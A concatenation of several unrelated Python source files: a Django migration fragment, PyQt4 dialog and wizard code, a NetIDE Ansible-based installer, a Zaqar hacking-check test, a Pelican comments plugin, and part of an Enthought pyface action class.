'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'to': u"orm['pages.Page']"}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'shop.category': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Category', '_ormbases': [u'pages.Page']},
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'combined': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product_options'", 'blank': 'True', 'to': u"orm['shop.ProductOption']"}),
u'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'}),
'price_max': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'price_min': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}),
'sale': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Sale']", 'null': 'True', 'blank': 'True'})
},
u'shop.order': {
'Meta': {'ordering': "('-id',)", 'object_name': 'Order'},
'additional_instructions': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'billing_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'billing_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'billing_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'billing_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'billing_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'discount_code': ('cartridge.shop.fields.DiscountCodeField', [], {'max_length': '20', 'blank': 'True'}),
'discount_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'payment_method': ('django.db.models.fields.CharField', [], {'default': "'paypal'", 'max_length': '6'}),
'shipping_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'shipping_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'shipping_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipping_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'shipping_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'tax_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'tax_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'transaction_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'shop.product': {
'Meta': {'object_name': 'Product'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['shop.Category']", 'symmetrical': 'False', 'blank': 'True'}),
u'comments_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'num_in_stock': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}),
u'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'rating_sum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_products_rel_+'", 'blank': 'True', 'to': u"orm['shop.Product']"}),
'sale_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'sale_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'sale_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'sale_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'unit_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'upsell_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'upsell_products_rel_+'", 'blank': 'True', 'to': u"orm['shop.Product']"})
},
u'shop.productoption': {
'Meta': {'object_name': 'ProductOption'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {})
},
u'shop.sale': {
'Meta': {'object_name': 'Sale'},
'active': ('django.db.models.fields.BooleanField', [], {}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'sale_related'", 'blank': 'True', 'to': u"orm['shop.Category']"}),
'discount_deduct': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'discount_exact': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'discount_percent': ('cartridge.shop.fields.PercentageField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'valid_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'valid_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['bccf']
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'modisTrack_about_ui.ui'
#
# Created: Sat Jan 16 05:12:28 2016
# by: PyQt4 UI code generator 4.10.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(291, 300)
Dialog.setMinimumSize(QtCore.QSize(291, 300))
Dialog.setMaximumSize(QtCore.QSize(554, 383))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/plugins/modisTrackL1L2/icon.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(Dialog)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_2 = QtGui.QLabel(Dialog)
self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.scrollArea = QtGui.QScrollArea(Dialog)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 271, 236))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.verticalLayout = QtGui.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label_3 = QtGui.QLabel(self.scrollAreaWidgetContents)
self.label_3.setWordWrap(True)
self.label_3.setOpenExternalLinks(True)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout.addWidget(self.label_3)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.scrollArea, 2, 0, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "About", None))
self.label.setText(_translate("Dialog", "MODIS Track L1 L2", None))
self.label_2.setText(_translate("Dialog", "ver. 1.0", None))
self.label_3.setText(_translate("Dialog", "<html><head/><body><p><span style=\" font-size:9pt;\">Modis Track L1 L2 Plugin</span></p><p>This module allows to create Terra/Aqua track at selected date as shapefile;\n"
" to create extents of scenes for all track points at day as shapefile;\n"
" to define needed scenes for user\'s vector layer.\n"
"Space-track.org can be used for TLE retrieving</p><p><span style=\" font-size:9pt;\">You can send your suggestions on silenteddie@gmail.com</span></p><p><span style=\" font-size:9pt;\">Modis Track L1 L2 - Licence GNU GPL 2</span></p><p><span style=\" font-size:9pt;\">Written in 2016 by Eduard Kazakov (</span><a href=\"http://www.ekazakov.info\"><span style=\" font-size:9pt; text-decoration: underline; color:#0000ff;\">ekazakov.info</span></a><span style=\" font-size:9pt;\">)</span></p></body></html>", None))
|
# -*- coding: utf-8 -*-
# $Id$
# -------------------------------------------------------------------
# Copyright 2012 Achim K�hler
#
# This file is part of openADAMS.
#
# openADAMS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License,
# or (at your option) any later version.
#
# openADAMS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with openADAMS. If not, see <http://www.gnu.org/licenses/>.
# -------------------------------------------------------------------
from PyQt4 import QtGui, QtCore, QtSql
from PyQt4.QtCore import Qt
import filepicker
import _oatr_tableview
import _oatr_commons
class cTestrunnerImportWizard(QtCore.QObject):
def __init__(self, parent=None):
super(cTestrunnerImportWizard, self).__init__()
self.testsuiteWizardPage = cTestsuiteWizardPage()
self.infoWizardPage = cInfoWizardPage()
self.wizard = QtGui.QWizard()
self.wizard.addPage(self.createImportDatabasePage())
self.wizard.addPage(self.testsuiteWizardPage)
self.wizard.addPage(self.infoWizardPage)
self.wizard.setWindowTitle(self.tr("Create new testrun"))
self.wizard.currentIdChanged.connect(self.idChangedHandler)
def idChangedHandler(self, currentId):
if currentId == 0:
# on first page, disable continue button when import filename is invalid
self.wizard.button(QtGui.QWizard.NextButton).setEnabled(self.inputFilePicker.isValidFilename())
elif currentId == 1:
self.testsuiteWizardPage.initTable(self.inputFilePicker.getFilename())
self.wizard.button(QtGui.QWizard.NextButton).setDisabled(self.testsuiteWizardPage.tableIsEmpty())
elif currentId == 2:
self.wizard.button(QtGui.QWizard.FinishButton).setEnabled(False) # user has to enter
fileInfo = QtCore.QFileInfo(self.inputFilePicker.getFilename())
fileInfo.setFile(fileInfo.dir(), fileInfo.baseName()+'.%s' % _oatr_commons.TR_FILE_SUFFIX)
fileName = fileInfo.filePath()
self.infoWizardPage.outputFilePicker.setFileName(fileName)
else:
pass
def createImportDatabasePage(self):
page = QtGui.QWizardPage()
page.setTitle(self.tr("Select database with testsuite to run"))
layout = QtGui.QHBoxLayout()
self.inputFilePicker = filepicker.cFilePicker()
self.inputFilePicker.sigValidFilename.connect(self.validImportFilename)
widgets = self.inputFilePicker.getWidgets()
widgets['label'].setText(self.tr("Database"))
widgets['dialog'].setNameFilter(self.tr("Database files (*.db);;All files (*.*)"))
widgets['dialog'].setFileMode(QtGui.QFileDialog.ExistingFile)
map(layout.addWidget, [w for w in (widgets['label'], widgets['combobox'], widgets['button'])])
layout.setStretch(1, 10)
page.setLayout(layout)
return page
def show(self):
if self.wizard.exec_() == QtGui.QDialog.Accepted:
return {'srcDatabase': self.inputFilePicker.getFilename(),
'destDatabase': self.infoWizardPage.outputFilePicker.getFilename(),
'testsuiteId': self.testsuiteWizardPage.getSelectedTestsuiteId(),
'title': unicode(self.infoWizardPage.leTitle.text()),
'description': unicode(self.infoWizardPage.teDescription.toPlainText())}
else:
return None
def validImportFilename(self, isValid):
self.wizard.button(QtGui.QWizard.NextButton).setEnabled(isValid)
class cTestsuiteWizardPage(QtGui.QWizardPage):
def __init__(self):
super(cTestsuiteWizardPage, self).__init__()
self.setTitle(self.tr("Select testsuite to run"))
layout = QtGui.QHBoxLayout()
self.tableView = _oatr_tableview.cTestsuiteTableView(self, model=None)
layout.addWidget(self.tableView)
self.setLayout(layout)
def initTable(self, databaseName):
self.database = QtSql.QSqlDatabase.addDatabase("QSQLITE", 'importconnection')
self.database.setHostName("")
self.database.setDatabaseName(databaseName)
self.database.open()
model = QtSql.QSqlTableModel(self, self.database)
model.setTable('testsuites')
self.tableView.setModel(model)
hiddencols = (1,3,4,5,6,7)
map(self.tableView.setColumnHidden, hiddencols, [True]*len(hiddencols))
self.tableView.setHeader()
model.reset()
model.select()
if not self.tableIsEmpty():
self.tableView.selectRow(0)
def tableIsEmpty(self):
return self.tableView.model().rowCount() == 0
def getSelectedTestsuiteId(self):
index = self.tableView.model().index(self.tableView.currentIndex().row(), 0)
return self.tableView.model().data(index).toInt()[0]
class cInfoWizardPage(QtGui.QWizardPage):
def __init__(self):
super(cInfoWizardPage, self).__init__()
self.setTitle(self.tr("Enter testrun information"))
layout = QtGui.QGridLayout()
self.outputFilePicker = filepicker.cFilePicker()
widgets = self.outputFilePicker.getWidgets()
widgets['label'].setText(self.tr("Testrun file"))
widgets['dialog'].setNameFilter(self.tr("Testrun files (*.%s);;All files (*.*)" % _oatr_commons.TR_FILE_SUFFIX))
widgets['dialog'].setFileMode(QtGui.QFileDialog.AnyFile)
widgets['dialog'].setAcceptMode(QtGui.QFileDialog.AcceptSave)
layout.addWidget(widgets['label'], 0, 0)
layout.addWidget(widgets['combobox'], 0, 1)
layout.addWidget(widgets['button'], 0, 2)
layout.addWidget(QtGui.QLabel(self.tr("Title")), 1, 0)
self.leTitle = QtGui.QLineEdit()
self.registerField("title*", self.leTitle); # title is mandatory
layout.addWidget(self.leTitle, 1, 1, 1, 2)
layout.addWidget(QtGui.QLabel(self.tr("Description"), alignment=Qt.AlignTop), 2, 0)
self.teDescription = QtGui.QTextEdit()
layout.addWidget(self.teDescription, 2, 1, 1, 2)
layout.setColumnStretch(1, 1)
self.setLayout(layout)
def validatePage(self):
fileName = self.outputFilePicker.getFilename()
if QtCore.QFile.exists(fileName):
r = QtGui.QMessageBox.warning(self, self.tr("Overwrite file"),
self.tr("File %s already exists. Okay to overwrite?" % fileName),
QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
if r == QtGui.QMessageBox.No:
return False
if not QtCore.QFile.remove(fileName):
QtGui.QMessageBox.critical(self, self.tr("Failure"), self.tr("Failed to remove file %s" % fileName))
return False
return True
|
"""
Copyright (c) 2015, NetIDE Consortium (Create-Net (CN), Telefonica Investigacion Y Desarrollo SA (TID), Fujitsu
Technology Solutions GmbH (FTS), Thales Communications & Security SAS (THALES), Fundacion Imdea Networks (IMDEA),
Universitaet Paderborn (UPB), Intel Research & Innovation Ireland Ltd (IRIIL), Fraunhofer-Institut für
Produktionstechnologie (IPT), Telcaria Ideas SL (TELCA) )
All rights reserved. This program and the accompanying materials
are made available under the terms of the Eclipse Public License v1.0
which accompanies this distribution, and is available at
http://www.eclipse.org/legal/epl-v10.html
Authors:
Gregor Best, gbe@mail.upb.de
"""
import json
import logging
import os
import platform
import requests
import stat
import subprocess as sp
import sys
import tempfile
from subprocess import call
from loader import environment
from loader import util
from loader.package import Package
# XXX make this configurable
install_package_command = "sudo apt-get install --yes {}"
class InstallException(Exception): pass
def do_server_install(pkg):
logging.debug("Doing server install for '{}' now".format(pkg))
prefix = os.path.expanduser("~")
with util.TempDir("netide-server-install") as t:
p = Package(pkg, t)
if not p.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
call(["./virtualEnv_Ansible_Install.sh"])
if "server" not in p.config:
raise InstallException('"server" section missing from configuration!')
conf = p.config["server"]
util.editPlaybookServer(conf)
if "host" in conf and platform.node() != conf["host"] and conf["host"] != "localhost":
raise InstallException("Attempted server installation on host {} (!= {})".format(platform.node(), conf["host"]))
# with open("Playbook_Setup/sever.yml", "w") as serverYml:
# serverYml.write("--- \n - name: install prereq for all hosts \n hosts: localhost \n roles: - prereq - core \n ...")
#install core and engine on server (usually localhost)
#read p.config[server] and add server to site.yml
call(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteServer.yml")])
#Check the rest of system requirements
logging.debug("Checking system requirements for {}".format(pkg))
if not p.check_no_hw_sysreq():
logging.error("Requirements for package {} not met".format(pkg))
return 2
def do_client_installs(pkgpath, dataroot):
"Dispatches installation requests to client machines after gaining a foothold on them. Requires passwordless SSH access to \
client machines and passwordless root via sudo on client machines"
with util.TempDir("netide-client-installs") as t:
pkg = Package(pkgpath, t)
if not pkg.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
clients = pkg.get_clients()
#controller = pkg.controllers
#print("controller: ")
#print(controller)
#for n in controller:
# print("instance of controller: ")
# print(n)
# for i in controller[n]:
# print(i)
util.editPlaybookClient(pkg)
util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteClient.yml")])
#===============================================================================
# util.write_ansible_hosts(clients, os.path.join(t, "ansible-hosts"))
#
# tasks = []
#
# # Can't use `synchronize' here because that doesn't play nice with ssh options
# tasks.append({
# "name": "Copy NetIDE loader",
# "copy": {
# "dest": '{{ansible_user_dir}}/netide-loader-tmp',
# "src" : os.getcwd()}})
#
# # We need to do this dance because `copy' copies to a subdir unless
# # `src' ends with a '/', in which case it doesn't work at all (tries
# # to write to '/' instead)
# tasks.append({
# "shell": "mv {{ansible_user_dir}}/netide-loader-tmp/loader {{ansible_user_dir}}/netide-loader",
# "args": {"creates": "{{ansible_user_dir}}/netide-loader"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader-tmp", "state": "absent"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader/netideloader.py", "mode": "ugo+rx"}})
#
# tasks.append({
# "name": "Bootstrap NetIDE loader",
# "shell": "bash ./setup.sh",
# "args": { "chdir": "{{ansible_user_dir}}/netide-loader" }})
#
# #is already cloned...
# tasks.append({
# "name": "Clone IDE repository",
# "git": {
# "repo": "http://github.com/fp7-netide/IDE.git",
# "dest": "{{ansible_user_dir}}/IDE",
# "version": "development"}})
#
# #has been done in setup server
# tasks.append({
# "name": "Install Engine",
# "shell": "bash {{ansible_user_dir}}/IDE/plugins/eu.netide.configuration.launcher/scripts/install_engine.sh"})
# #add creates:
# tasks.append({
# "file": {
# "path": dataroot,
# "state": "directory"}})
#
# tasks.append({
# "name": "Register Package checksum",
# "copy": {
# "content": json.dumps({"cksum": pkg.cksum}, indent=2),
# "dest": os.path.join(dataroot, "controllers.json")}})
#
# playbook = [{"hosts": "clients", "tasks": tasks}]
#
# #use new role system here !
# for c in clients:
#
# ctasks = []
#
# apps = []
# # Collect controllers per client machine and collect applications
# for con in pkg.controllers_for_node(c[0]):
# apps.extend(con.applications)
# cname = con.__name__.lower()
# if cname not in ["ryu", "floodlight", "odl", "pox", "pyretic"]:
# raise InstallException("Don't know how to install controller {}".format(cname))
#
# script = ["{{ansible_user_dir}}", "IDE", "plugins", "eu.netide.configuration.launcher", "scripts"]
# script.append("install_{}.sh".format(cname))
#
# ctasks.append({
# "name": "install controller {}".format(cname),
# "shell": "bash {}".format(os.path.join(*script)),
# "args": {"chdir": "{{ansible_user_dir}}"}})
#
# # Install application dependencies
# # XXX: ugly :/
# # XXX: libraries
# for a in apps:
# reqs = a.metadata.get("requirements", {}).get("Software", {})
#
# # Languages
# for l in reqs.get("Languages", {}):
# if l["name"] == "python":
# if l["version"].startswith("3"):
# l["name"] += "3"
# else:
# l["name"] += "2"
# elif l["name"] == "java":
# if "7" in l["version"]:
# l["name"] = "openjdk-7-jdk"
# elif "8" in l["version"]:
# l["name"] = "openjdk-8-jdk"
# else:
# l["name"] = "openjdk-6-jdk"
#
# ctasks.append({
# "name": "install {} (for app {})".format(l["name"], str(a)),
# "apt": {"pkg": "{}={}*".format(l["name"], l["version"])}})
# playbook.append({"hosts": c[0], "tasks": ctasks})
#
# # A valid JSON-document is also valid YAML, so we can take a small shortcut here
# with open(os.path.join(t, "a-playbook.yml"), "w") as ah:
# json.dump(playbook, ah, indent=2)
# print(playbook)
# util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", "-i", os.path.join(t, "ansible-hosts"), os.path.join(t, "a-playbook.yml")])
#===============================================================================
|
# Copyright (c) 2017 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from zaqar.hacking import checks
from zaqar.tests import base
class HackingTestCase(base.TestBase):
def test_no_log_translations(self):
for log in checks._all_log_levels:
for hint in checks._all_hints:
bad = 'LOG.%s(%s("Bad"))' % (log, hint)
self.assertEqual(1, len(list(checks.no_translate_logs(bad))))
# Catch abuses when used with a variable and not a literal
bad = 'LOG.%s(%s(msg))' % (log, hint)
self.assertEqual(1, len(list(checks.no_translate_logs(bad))))
|
# -*- coding: utf-8 -*-
import traceback
from pelican import signals
from henet.comments import ArticleThread
from henet.rst.rst2html import rst2html
# xxx read config
storage_dir = '/Users/tarek/Dev/github.com/acr-dijon.org/comments/'
# xxx cache
def add_comments(generator, content):
try:
# the article unique id is its relative source path,
# so the comments are not dependant on the URL.
source_path = content.get_relative_source_path()
article_uuid = source_path.encode('utf8')
thread = ArticleThread(storage_dir, article_uuid)
thread = thread.asjson()
for comment in thread['comments']:
html = rst2html(comment['text'], theme='acr', body_only=True)
comment['html'] = html
content.metadata["comments"] = thread
except:
# XXX for some reason Pelican does not print plugins exceptions
traceback.print_exc()
raise
def register():
signals.article_generator_write_article.connect(add_comments)
|
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enth373ought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" An action manager item that represents an actual action. """
# Enthought library imports.
from enthought.traits.api import Any, Instance, List, Property, Str
# Local imports.
from action import Action
from action_manager_item import ActionManagerItem
# Import the toolkit specific versions of the internal classes.
from enthought.pyface.toolkit import toolkit_object
_MenuItem = toolkit_object('action.action_item:_MenuItem')
_Tool = toolkit_object('action.action_item:_Tool')
_PaletteTool = toolkit_object('action.action_item:_PaletteTool')
class ActionItem(ActionManagerItem):
""" An action manager item that represents an actual action. """
#### 'ActionManagerItem' interface ########################################
# The item's unique identifier ('unique' in this case means unique within
# its group).
id = Property(Str)
#### 'ActionItem' interface ###############################################
# The action!
action = Instance(Action)
# The toolkit specific control created for this item.
control = Any
# The toolkit specific Id of the control created for this item.
#
# We have to keep the Id as well as the control because wx tool bar tools
# are created as 'wxObjectPtr's which do not have Ids, and the Id is
# required to manipulate the state of a tool via the tool bar 8^(
# FIXME v3: Why is this part of the public interface?
control_id = Any
#### Private interface ####################################################
# All of the internal instances that wrap this item.
_wrappers = List(Any)
###########################################################################
# 'ActionManagerItem' interface.
###########################################################################
#### Trait properties #####################################################
def _get_id(self):
""" Return's the item's Id. """
return self.action.id
#### Trait change handlers ################################################
def _enabled_changed(self, trait_name, old, new):
""" Static trait change handler. """
self.action.enabled = new
return
def _visible_changed(self, trait_name, old, new):
""" Static trait change handler. """
self.action.visible = True
return
###########################################################################
# 'ActionItem' interface.
###########################################################################
def add_to_menu(self, parent, menu, controller):
""" Adds the item to a menu. """
if (controller is None) or controller.can_add_to_menu(self.action):
wrapper = _MenuItem(parent, menu, self, controller)
# fixme: Martin, who uses this information?
if controller is None:
self.control = wrapper.control
self.control_id = wrapper.control_id
self._wrappers.append(wrapper)
return
def add_to_toolbar(self, parent, tool_bar, image_cache, controller,
show_labels=True):
""" Adds the item to a tool bar. """
if (controller is None) or controller.can_add_to_toolbar(self.action):
wrapper = _Tool(
parent, tool_bar, image_cache, self, controller, show_labels
)
# fixme: Martin, who uses this information?
if controller is None:
self.control = wrapper.control
self.control_id = wrapper.control_id
self._wrappers.append(wrapper)
return
def add_to_palette(self, tool_palette, image_cache, show_labels=True):
""" Adds the item to a tool palette. """
wrapper = _PaletteTool(tool_palette, image_cache, self, show_labels)
self._wrappers.append(wrapper)
return
def destroy(self):
""" Called when the action is no longer required.
